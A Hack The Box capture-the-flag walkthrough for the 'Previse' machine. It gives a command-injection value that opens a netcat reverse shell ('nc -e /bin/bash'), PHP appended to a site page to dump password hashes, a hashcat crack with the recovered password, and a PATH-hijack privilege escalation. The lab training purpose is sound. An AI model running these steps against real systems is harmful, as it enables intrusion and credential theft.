Hack The Box walkthrough
IP address: 10.10.11.104
Welcome to Previse write up! This box is a little tricky on user flag but it forces you to think out of bounds.
User own
Let’s start with nmap using the following options:
-sV
for version detection;-O
for operating system detection.
The latest option requires root privileges to work properly, so use sudo.
└─$ sudo nmap -sV -O 10.10.11.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 00:00 CEST
Nmap scan report for 10.10.11.104
Host is up (0.029s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Note: I’ve done some research on these versions and a directory bruteforcing but there was nothing useful here.
Let’s explore the web application running on port 80
.
It seems to be a php web application that redirects to a login page.
When using curl, it’is possible to get the real response page from the webapp because curl does not follow redirects by default.
curl -is -X GET 10.10.11.104/index.php
Ehi, we’ve got a different page here: the index page. The index page includes a navigation menu with relative paths to the other pages of web application.
Let’s explore something interesting: accounts.php.
curl -is -X GET 10.10.11.104/accounts.php
In that page there is a form (targeting on the same page) with 3 input fields:
username
;password
;confirm
.
Oh, and usernames and passwords must be between 5 and 32 characters.
We need to forge a specific curl request using POST
to create the new user hacker.
curl -is -X POST -d "username=hacker&password=hacker&confirm=hacker" 10.10.11.104/accounts.php
Ok, let’s try to login with our new credentials: hacker
/hacker
.
And we’re in!
Now, there are some relevant sections here. Take your time to explore the website. I’ve downloaded a log file that gives me information about another user m4lwhere
. There is a form to upload a new file to the system and it is possible to download a backup of the entire web site.
This is the key of the entire hacking operation.
We can click on the file name to download that zip.
Once we’ve unzipped it, we can watch deeply at the web application code.
Look at file_logs.php
: there is a form to logs.php
to download a log file and, internally, it uses python to parse a parameter called delimeter
.
We can move to section management menu > log data, then we can edit that parameter to create something useful for our hack.
Set this command as a value of delimeter parameter comma && nc -e /bin/bash <my ip> 1234. This will launch a reverse remote shell usingnetcat to port 1234.
Note: This kind of attack is called Command injection.
So, let’s setup a netcat listener on your attacker box with the following command:
nc -lvp 1234
Next, we can inject the code directly into the select using browser tools (from the log data page, click using the right button on the select of the file delimeter parameter and select inspect).
We know exactly what we are doing 🙂
The netcat listener will now be responding as expected: we’ve got a reverse shell with target system as www-data
user.
To find the first flag, we can list the m4lwhere
home directory and inside of it, we will find a file called user.txt
. Unfortunately that file was readable exclusively by m4lwhere.
So, we need to connect as m4lwhere
to read the flag. We can modify a page of the web site to get all the user from database in order to obtain the password hashes.
Let’s append this script to status.php
file:
<?php
$db = connectDB();
$query = "SELECT username, password FROM accounts";
$users = $db->query($query);
if ($users->num_rows > 0) {
while($row = mysqli_fetch_assoc($users)) {
var_dump($row);
}
}
$db->close();
We need to join the lines with our editor and append the result to status.php
through the shell using this command:
echo '<code>' >> status.php
Next, we can refresh the status page to get the results.
So the m4lwhere
’s password hash is:
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf
Note: Look at the image: I’ve got other players information too. There are even the credentials we used to log in.
Ok, we’ve got the password hash. Let’s reverse it using hashcat
.
Note: Usually, the difficulty with hash reversing process is to find the right hash format. This page shows generic hash types.
Hashcat uses the following format code to manage hash with salt in $1$
format.
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Launch hashcat
using the command:
hashcat $1$🧂llol$DQpmdvnb7EeuO6UaqRItf rockyou.txt -m 500
and, after some time, it will show the corresponding password.
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
Now the question is: is this password the same of the system user m4lwhere
? Let’s find out using ssh and these credentials:
- username:
m4lwhere
- password:
ilovecody112235!
ssh m4lwhere@10.10.11.104
It works!
We’re able to get the flag from the user’s home directory.
System own
First of all, once we need to connect through SSH
as m4lwhere
user.
We can take a look at sudo
permissions:
m4lwhere@previse:/tmp$ sudo -l
User m4lwhere
may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
It seems that access_backup.sh
script can be run as root by m4lwhere
. If we open the script, we can see that it uses gzip
command to create backups.
Let’s replace the system gzip
with a custom one. We can create a gzip
executable file into /tmp
directory with the following content:
sudo /bin/bash -c "cat /root/*" | tee rootfolder.txt
This uses a single bash command to cat everything inside root folder and pipe to the file rootfolder.txt
.
Next, we need to edit the system variable PATH
in a way that the first dir the system is looking for a command is /tmp
.
export PATH=/tmp:$PATH
Run the backup script using sudo.
sudo /opt/scripts/access_backup.sh
And then cat the content of our file.
cat rootfolder.txt
This gives us the root flag.
Well Done!
Mattia Peretti
Hackhouse.net author